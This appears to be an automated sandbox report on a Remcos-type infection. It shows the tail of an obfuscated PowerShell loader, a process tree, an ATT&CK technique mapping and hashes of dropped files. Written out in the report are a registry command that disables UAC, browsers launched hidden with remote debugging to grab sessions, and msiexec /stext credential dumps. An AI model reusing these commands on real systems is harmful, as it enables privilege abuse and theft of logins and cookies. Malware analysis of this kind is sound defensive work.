esknBiflGRepeLUnp.ESpleDY tpyBespg CalT dueiRiemgDds eHjkiSDrab+Bl k+Si.e% Sol$Unsuc O,tOBllen E cSUngkt SteRRubbu CamcEremTSko.iLovfoLselnSedaA Scol A blTi,ey rov.Exarce,feoFrinu SkonGarrT') ;$Slukket=$Constructionally[$Treeing]}$Polaristrobometer=307322;$databgernterpretative=30954;dalmatiners (Preenforcing ' ele$Evi,GA,icL TomoTr mbPoleADrhalGire:Flagd edeRStraAD.gaGHoveePreueulovrBygnn auE run V l=Ubet AlkoGDallEBru tSt d-OutrC nseo H,nNN,nrTOmseECrofnShelT M.d St e$Predooph,VAs iENon RSkilSTovekIatrU A eDCiriS Al.p I oRSilvodegaDDemouautokDybsTImmuI LacO.igan LonEUdf.rBas.n TenetrniS');dalmatiners (Preenforcing 'pols$ExtegrecolAd loYde.b.steaBai,lPins: AmoE Gral Fl a Sorb Dego E erMi,naHumbtBicieSupesSyge S,e=Udb. Kali[BestSoneryPressFremtLar.eEgetmEmba.A,dwCRehaoMo rnAffav KleeT llrKrfttGr m]Stot: ,is:BlafFCla rR.daoTaksmTatoBT pka oofsfld eEarn6 .ud4Mis,S lytB,rtr ElriReapnUnstg.ngv(Orga$ T.dD Zy rPostasab.gTalleArche lygrW,ennwo,geNatb)');dalmatiners (Preenforcing ' Gra$Pa tGChadLUdenOPlumbBenaa Vi.l Pra: RepJSkanIBebum A tjBalaASupeMN tusLedn Kaff=Natt In r[ arrssqueYmid s FagTbl kEForlmAcre.S,amTBri eRachxcic TCal . S,mESpidNNonfCWan Or gnDSvmmiBrann St g.ors]Typo:Cali: s iaFjersTr ic,jleISub,ICons.NetsGLageeMa cT Tr SFilmTMichrBopyIBo unFri.gAuto(Hj,m$InvoEEn.elBu taIoniBDveloPantrCoota PretAflaeTodksHist)');dalmatiners (Preenforcing '.tal$B ocGRimsLInfaORealBDainAUdstlgamm:SpinpBidseThorlPanmeLugtc EenASpydnUnfaUL ndSResn= .re$PrerjGib i FejmUltijEpima sadMOverSLanc.CavasSu fuSillbbardsOleaT orsROpb iD asnA.begA om(Sejs$ Ep,PHoveO raglRib ADdker,ednI Pl.SDoodTNonbrPuseOCatcbspe OUnc MDisse.olstOutqE jerR alg,Kont$ ,usDP,tta G eTUndeaElg BetvrgInduERediR miln UndtSa sE orkROph P unkRRevieP.ssTPr mABri.TViroiM llVDagse ut)');dalmatiners $Pelecanus;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3708
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1900
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4424
- - C:\Program Files\Google\Chrome\Application\Chrome.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:3308
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9eaebcc40,0x7ff9eaebcc4c,0x7ff9eaebcc58
      4⤵
      PID:3344
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,5999442472606828204,15833932339569652173,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2
      4⤵
      PID:4336
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2000,i,5999442472606828204,15833932339569652173,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2132 /prefetch:3
      4⤵
      PID:4284
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,5999442472606828204,15833932339569652173,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2448 /prefetch:8
      4⤵
      PID:3652
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,5999442472606828204,15833932339569652173,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3180 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4412
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,5999442472606828204,15833932339569652173,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4588
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4572,i,5999442472606828204,15833932339569652173,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4552 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3404
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mkvdxetrpqimuhjyvplyprghf"
    3⤵
    PID:4800
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mkvdxetrpqimuhjyvplyprghf"
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mkvdxetrpqimuhjyvplyprghf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2532
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pebnyxdtdzarenxkeagasetyohht"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:4696
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zgggypomrhswhttovlttdjnponzcqtlj"
    3⤵
    PID:2380
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\zgggypomrhswhttovlttdjnponzcqtlj"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3376
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:4916
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9dbfa46f8,0x7ff9dbfa4708,0x7ff9dbfa4718
      4⤵
      PID:4272
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,7721871392162822625,8551705620649628695,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
      4⤵
      PID:960
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,7721871392162822625,8551705620649628695,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
      4⤵
      PID:856
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,7721871392162822625,8551705620649628695,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
      4⤵
      PID:1184
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2124,7721871392162822625,8551705620649628695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:60
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2124,7721871392162822625,8551705620649628695,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2664
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2124,7721871392162822625,8551705620649628695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3564
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2124,7721871392162822625,8551705620649628695,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3768

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1120

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:540

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Modify Authentication Process

T1556

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
65ac1f552b78da4a2b189d363a878fdf

SHA1
a752ce797e1cea0d5b92bdda899888074e9a5a24

SHA256
b013bb3cee6bc32ce2ea6444b288432bf95c97dd06ae23eaae3c1840b24229e7

SHA512
45f9de05c827f2d0e9bf4de9283d6f70169c29fda91de3da4529f02205e20112f518a565319a89b59481c912099b5f9fe49697a7b471958b036f8737c82b413e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71444def27770d9071039d005d0323b7

SHA1
cef8654e95495786ac9347494f4417819373427e

SHA256
8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

SHA512
a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
40B

MD5
5abc02bc8681ac86ac574daf188a0b89

SHA1
e0dfa5915a617ce6aaea65fe986e29424515e29c

SHA256
6ec629b4dfc73f92abf5433d95903815fa5ed607fc45ed4b48ca36d188891b8d

SHA512
2ac2cead05a559da852961798a8b7af1b4fa725b61ee6f0687c832387d9f6766a88c8902f1e5d187d2b7c38141cd9897cd9371859d82e8d4d8f8a2cc08ccaf83

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
d0b880079a898592626e4cb69e14673d

SHA1
e28891fe7540d81be928a17d1a8571582a5b1251

SHA256
df5a920932592a30a737fb49f003b2908fbb956f250132573d116081efb03e7c

SHA512
ae26444c142b5018021d89a380d35a4493a754be70f6a0b49bfafa84d1c61b01b1d53561e6c57cc7e8630b8d86f39a623a924b1e37a30258439ac0a1b302d35d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
c2f49eb15089647f2028fd25675ac303

SHA1
6661f34cb2e3b735988481b3150b3a6a09cc2dce

SHA256
c870b0529a7ca2cff2067be57479481f23c86d35810dbee322a8adc612d27486

SHA512
d9016a022dde2071308cd2985575f96c545a8bcfeefd80ca75349a093c5984e4fa0b8caed2b4f7d9b2d67ed0c84984b54cca12c28d0664c0f9cfebba9b4600bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
942e27c8e88c68b193b5b83d498d75a7

SHA1
0b62b2cedb5995d57692c78ece7ba21897a62bae

SHA256
a378a0fb86e05606fbfb037dacad22a1e7dd4394bf285f3a8a3b9c325718d7fa

SHA512
521a05f424e28821604228eb21059fb708c2e38ee99d0c8b1ed5deed2c4a869ef52bdbbe9535faf5e32b85ca90c0ea20385c013adc61d13ad358d0d16db0fcbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

Filesize
20B

MD5
9e4e94633b73f4a7680240a0ffd6cd2c

SHA1
e68e02453ce22736169a56fdb59043d33668368f

SHA256
41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

SHA512
193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
0c00a50365ce0b1d6b44340d328e8792

SHA1
26a61bce297d5d70ff7a4fff312a5085dc86cf90

SHA256
faad1d5d933dc1624d491c670da2a84a0d943b74acbb16580238f0eb7809b74a

SHA512
ae5cfd805bc9c15274c925036c7a66af4d44d7b0f1376c22a005addabcfed615b1a8e829505761b1396d8e2eaef9606815e4490c9d59b0d0786103bbb985a084

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Extension State\LOG

Filesize
263B

MD5
e0ed10fa5f8067bf99c830b37edee890

SHA1
373a708feb397d8a945c107879902352da0f4cf4

SHA256
7b35b50508051839034740bba91ef106ff250cfe105247599ddab6fde116ccbe

SHA512
830529848ea198a647cb4fa76108c4a814293b1cb9fbd8b25d12e843c6dae528bdb51db36971d042bcf327ab59fe83e78a3b557c91936423b6f175f907b4964a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

Filesize
20KB

MD5
b40e1be3d7543b6678720c3aeaf3dec3

SHA1
7758593d371b07423ba7cb84f99ebe3416624f56

SHA256
2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4

SHA512
fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

Filesize
256KB

MD5
496947da44b93ba19787b632b3ce7a46

SHA1
391f28d6a826c3edaa567a1abb3878f580d2c93f

SHA256
6ca54e0169a458828eb0ac626b7c6155e1aee21524c0a2172f4d142730cdd5d6

SHA512
d011260ee6758d9c50713730a3f7092a2e5f3c5315e58a70b4e9f1097a15568000ccc0390c83b8bc8753e33f226b553cd6a360b8e0d22b090b7c6a5122455ce0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

Filesize
192KB

MD5
d30bfa66491904286f1907f46212dd72

SHA1
9f56e96a6da2294512897ea2ea76953a70012564

SHA256
25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907

SHA512
44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

Filesize
275B

MD5
ac29adb035896aec9f05c34ba640fb2e

SHA1
c376be635bb8ac0a737d698c22a59c15d32188dc

SHA256
be3aee84f29528a220f02e00eba3ca5130695cb66b31395c7a744d2c560e6d1c

SHA512
38a903429fd24c10e6fd9c8230714e41689037d0238e498be583d4f46d65bf6448aad1fc1044cf266b07293944f6d4eaae5dc3eaeeb678a04880e44929623f43

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

Filesize
1KB

MD5
a7a394caf113ae42028e1cfbbcfe7576

SHA1
b7b248c477f13ed3cac60c94041962108e371b42

SHA256
2afa1168d96be303f4bbcd3db479abbce122a734a224d7f12525555d9a2d279d

SHA512
53961603a6b3ba01221ccbd09d9c38ee598837e2ad407c0f561d089c5763e5cbc82d3709c272097c191b40dc7dc4cc72902b43b778248f8ee6c64c0c523119c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

Filesize
20KB

MD5
26a2e4bc4afda25ff70742c478cdcfdd

SHA1
c2dd2c27272da2e9f85913406d40eed4e7958c01

SHA256
825da106fd73274d965f1c9c1cdbcd5d9decd6d3f5a5906c86760b8c868a18a5

SHA512
d2b8efe75674f2a723f621cf4c3896b09145627d4b307696d8330f07e2a992120b6cd6af760919522e15ea5d37b51202416720f58e7992a19e70053839809966

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
1KB

MD5
75b40455c9a028f3930bfe2611baef9b

SHA1
1efd55860c3fc15c44fbf5ff35ccb8f4e0a5b8f3

SHA256
ef3c2b9e19dfb137f6a7e9bfd6ec6713382a7349648db28ce22ed4fefd797516

SHA512
4d44c5d35ef7eafd4805621a6557694eeba9bb2b720a3ba903bccd572154fb943c240f23bd8e4dd2ea0a0d1ee055976e4b413043e645bb050d26315e018a73dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
5KB

MD5
2c3c56292ddf339ce831b4dd56db22df

SHA1
d35cdc02855290af270b79a1664ad149ef35887a

SHA256
827627cddae59374a25a693e90e93d6b1fe47b002132ddf127150dab235b75bc

SHA512
d26b6ee4627efa2c155e38af6ad08fae72041f8de177149f196b7685115b6ebf1f2fd0109e5da6347c8b0523d6e04d87a36a18f0307d200feb1bfe53f6f98df9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
24KB

MD5
b273175ed670469bf73f2500c9611c77

SHA1
4ddeb5747309350511b11ad3917e18b254f96880

SHA256
3dbc8f1743075e9b8e13090f9de6097bf4f0d1d093782673de2c8bb046c17147

SHA512
3f64fdc3f6a3e6dfc692ec7eceb1da26ba3476bb75b6d18ea3f834e52e8e03fb1ddd11168e2cbbc0f260b25154a7e8eadaff78d4b50eaee63c3e4d682a57a889

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
15KB

MD5
8fb5b9ba3b303f6c3caed559a563b9fe

SHA1
9697ad8495afb27aacdf5ad7359dd919ce22f0ce

SHA256
b2ae53cd2ededc97e559fee2ec6de52ba7aa615093d1a4ceaa86d53e879c6713

SHA512
30a776a4ca19360216eb8d66819e28001fe552194a12f1b2d3e802f5a8a1eb7a690ea2dd4cfe2c94324817bc683cf487009d925b0c0acf5997394146b9bf4566

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

Filesize
241B

MD5
9082ba76dad3cf4f527b8bb631ef4bb2

SHA1
4ab9c4a48c186b029d5f8ad4c3f53985499c21b0

SHA256
bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd

SHA512
621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

Filesize
279B

MD5
ad8ecf4d64256f2600780f112f849b15

SHA1
81483bec71928a10331067bc6571bcf47a96838f

SHA256
2f9a595254fe147d43ceaf3fe5d811effddb1767bee97470e9a6145b74e757e3

SHA512
457e9ebf5a76508d22eea7c6b85b1663ee1e174e3b3093afcfc0b5db0bc2d577dd666de371c8effad3fffc93b74980f00a37cfaa7e5fefef76d477242f2eb8a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

Filesize
80B

MD5
69449520fd9c139c534e2970342c6bd8

SHA1
230fe369a09def748f8cc23ad70fd19ed8d1b885

SHA256
3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277

SHA512
ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

Filesize
263B

MD5
10a2dd1948568424bff00ae40a7116ce

SHA1
ec05df465eef1a36ccd6e3f8ae37eb5e7b7fad90

SHA256
5f3ad6ab77fff118543300b7e24e67ed3af51ed7f4a0eb374b0d4872d2e60d66

SHA512
4f50a3daf43d05264705d97de53dada85273b7bc68456daae50480ec915dca9441e95c96a9c62de56c7bb503086e9cba290cb223b05496af536df1701a8f670d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

Filesize
40B

MD5
148079685e25097536785f4536af014b

SHA1
c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

SHA256
f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

SHA512
c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

Download Submit
